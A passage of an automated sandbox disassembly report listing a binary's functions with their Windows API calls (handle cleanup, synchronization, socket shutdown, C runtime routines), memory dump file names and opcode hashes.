                                                                            Function 007EC243 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007EC277
                                                                            • __isleadbyte_l.LIBCMT ref: 007EC2AA
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 007EC2DB
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 007EC349
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 15450cfd3c457239c7c3f9129fe328e4f020f27659d77db1e5b7ce2a962a2c33
                                                                            • Instruction ID: 4a7f213758d97a6be1f62860fc48f1d975b69563f49de8778bcee1c4f19038b0
                                                                            • Opcode Fuzzy Hash: 15450cfd3c457239c7c3f9129fe328e4f020f27659d77db1e5b7ce2a962a2c33
                                                                            • Instruction Fuzzy Hash: 9F312534A062C9EFCB22CFA6C8849BD7BA8BF09310F1485A8F5A09B191D334CD42DB51
                                                                            Function 007E1DB0 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E1E06
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E1E2A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1E4C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1E6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: 1c849bc8349cd8f16be4bf93941b5d8a36ac3d1ba7fab1dfde309d2d3957dc2a
                                                                            • Instruction ID: 586ede14555035fdb23765380f74bdfde5fe2f9e3c0e4589e23a68e39c478078
                                                                            • Opcode Fuzzy Hash: 1c849bc8349cd8f16be4bf93941b5d8a36ac3d1ba7fab1dfde309d2d3957dc2a
                                                                            • Instruction Fuzzy Hash: 682174717002449BCF0CCB58D59AB7CBBB5FBE4309F9541ADD046AF6A1CB749981CB50
                                                                            Function 007EF653 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction ID: f102f96a47342219026b223771e1f0861f0c3d6a1c9584b97a7b247a5a393c74
                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction Fuzzy Hash: ED11403240118AFBCF125E85CC45CEE3F62BB1C394B598425FA1859831D73BC9B1AB81
                                                                            Function 007DC850 Relevance: 6.0, APIs: 4, Instructions: 46synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007DC887
                                                                            • CloseHandle.KERNEL32(?), ref: 007DC898
                                                                            • CloseHandle.KERNEL32(?), ref: 007DC8A5
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC8BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocalObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2545295749-0
                                                                            • Opcode ID: 95686c5b3930c93fb8471fd2b57fb6f23306e76941603dcb2cc68cac8c73300e
                                                                            • Instruction ID: 3c72f5d6996ce2492306f09eebf4a0915d7fdb705db212b90a9ba18f4ebf9381
                                                                            • Opcode Fuzzy Hash: 95686c5b3930c93fb8471fd2b57fb6f23306e76941603dcb2cc68cac8c73300e
                                                                            • Instruction Fuzzy Hash: 27110C79A00208EFCB04DF94C988EADBBB5BF48300F20C589E90557351D738EE41EB54
                                                                            Function 007E1928 Relevance: 6.0, APIs: 4, Instructions: 45synchronizationnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E15F6
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E163E
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1953
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1977
                                                                            • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 007E19A8
                                                                            • shutdown.WS2_32(?,00000002), ref: 007E19D1
                                                                            • closesocket.WS2_32(?), ref: 007E19E5
                                                                            • CloseHandle.KERNEL32(?), ref: 007E19F6
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D0F
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D23
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1D52
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D7D
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D8A
                                                                            • LocalFree.KERNEL32(?), ref: 007E1D9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                                                                            • String ID:
                                                                            • API String ID: 3044467104-0
                                                                            • Opcode ID: 4b140ff7eb035f0ba02bacccba7d962d3d762604fd747b5d0a5e7e13d86a2b84
                                                                            • Instruction ID: 339e5841064f0aa0da92f162cdf12fc71dcbdec67204e0844193306559d77627
                                                                            • Opcode Fuzzy Hash: 4b140ff7eb035f0ba02bacccba7d962d3d762604fd747b5d0a5e7e13d86a2b84
                                                                            • Instruction Fuzzy Hash: 92211974605258CBCB24CF54ED897ED7771BB98304F6084D9D5CAA6250CBB86EC1CF11
                                                                            Function 007E1613 Relevance: 6.0, APIs: 4, Instructions: 45synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E163E
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1678
                                                                            • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 007E18CE
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D0F
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D23
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1D52
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D7D
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D8A
                                                                            • LocalFree.KERNEL32(?), ref: 007E1D9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                            • String ID:
                                                                            • API String ID: 785092289-0
                                                                            • Opcode ID: 6462114733eacdfe690aaad6f7367ab81113d7f101ee6dd8b222280d3ef33cc2
                                                                            • Instruction ID: 9c1a531805b6b82ed0c6d663d98ac80ceea61fc3aa7c9526489b66b28478ac61
                                                                            • Opcode Fuzzy Hash: 6462114733eacdfe690aaad6f7367ab81113d7f101ee6dd8b222280d3ef33cc2
                                                                            • Instruction Fuzzy Hash: AE21F674605218CFDB24CF59E989BE977B1BB98308F608498D5C696290CBB85EC0CF11
                                                                            Function 007C21E0 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE5B), ref: 007C21F2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE5B), ref: 007C220A
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE5B), ref: 007C2217
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE5B), ref: 007C2236
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: b7e674966149acd426cc5ca4dc6602f1fb7bd12dab6a5f44e5ea0fbebf71c604
                                                                            • Instruction ID: 7bd8278074cfe810d2fdc5a5e2d67a2bedd843961c6e519054699197685f537b
                                                                            • Opcode Fuzzy Hash: b7e674966149acd426cc5ca4dc6602f1fb7bd12dab6a5f44e5ea0fbebf71c604
                                                                            • Instruction Fuzzy Hash: B9F074B110A200DBE714AB69ED4CB5A3BA9B3C8316F104F19B615572B0C7BD9885CF50
                                                                            Function 007C42B0 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE60), ref: 007C42C2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE60), ref: 007C42DA
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE60), ref: 007C42E7
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE60), ref: 007C4306
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: b4768b57f4a01ceede0734ea75510710d77aaf8d5e7b948f2f33327dd7321c8b
                                                                            • Instruction ID: 8f1dc96442b4f328d8e28a1c0e2369ca476645bb62b20d2fb705802a7135b534
                                                                            • Opcode Fuzzy Hash: b4768b57f4a01ceede0734ea75510710d77aaf8d5e7b948f2f33327dd7321c8b
                                                                            • Instruction Fuzzy Hash: 28F07FB1102201DFEB149BA8EE5CB5B3BADB7C4315F444F28F6159A2B0CB789884CB50
                                                                            Function 007E778B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007E39FB: __getptd.LIBCMT ref: 007E3A01
                                                                              • Part of subcall function 007E39FB: __getptd.LIBCMT ref: 007E3A11
                                                                            • __getptd.LIBCMT ref: 007E779A
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __getptd.LIBCMT ref: 007E77A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 803148776-1018135373
                                                                            • Opcode ID: f21ed9317b392a23d3a0101c206c60fad0d49fe9fee2f2183ce286149558712d
                                                                            • Instruction ID: f50bf2d4e96a43f4648d798c289ef2705c242ae0ef402819acfdd7a9893557a5
                                                                            • Opcode Fuzzy Hash: f21ed9317b392a23d3a0101c206c60fad0d49fe9fee2f2183ce286149558712d
                                                                            • Instruction Fuzzy Hash: B3016D3580A284CEDF399F66D84C6ADB3F6BF28316F64442EE44196651CF389991CF41
                                                                            Function 007D9AEF Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C80
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C8A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D9C96
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9CA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: 9af4fa757a0bd926373b4877f4519c8da747db0fdb56c224b35fe166a405d917
                                                                            • Instruction ID: 79ea19b0abd62a29e31350db101b34eed8354291cf22d5dc0758269089885d28
                                                                            • Opcode Fuzzy Hash: 9af4fa757a0bd926373b4877f4519c8da747db0fdb56c224b35fe166a405d917
                                                                            • Instruction Fuzzy Hash: AE016B75A10204DFCB54DFF4E98895EBBB5BF89301F104A94F60AAB314CA359D40DF60
                                                                            Function 007D9AB6 Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C80
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C8A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D9C96
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9CA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: 1114bb50d7bb7329cfcb173ae25f188c568de9efcce5f79d5e2d46b4093f893f
                                                                            • Instruction ID: 79ea19b0abd62a29e31350db101b34eed8354291cf22d5dc0758269089885d28
                                                                            • Opcode Fuzzy Hash: 1114bb50d7bb7329cfcb173ae25f188c568de9efcce5f79d5e2d46b4093f893f
                                                                            • Instruction Fuzzy Hash: AE016B75A10204DFCB54DFF4E98895EBBB5BF89301F104A94F60AAB314CA359D40DF60
                                                                            Function 007D9A80 Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C80
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C8A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D9C96
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9CA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: d059d293a5f4277054cba504ed0b072ec5b69a6ef6509c42c1f1447392cd145d
                                                                            • Instruction ID: 79ea19b0abd62a29e31350db101b34eed8354291cf22d5dc0758269089885d28
                                                                            • Opcode Fuzzy Hash: d059d293a5f4277054cba504ed0b072ec5b69a6ef6509c42c1f1447392cd145d
                                                                            • Instruction Fuzzy Hash: AE016B75A10204DFCB54DFF4E98895EBBB5BF89301F104A94F60AAB314CA359D40DF60
                                                                            Function 007DB66D Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DB928
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB93D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB95D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB97D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
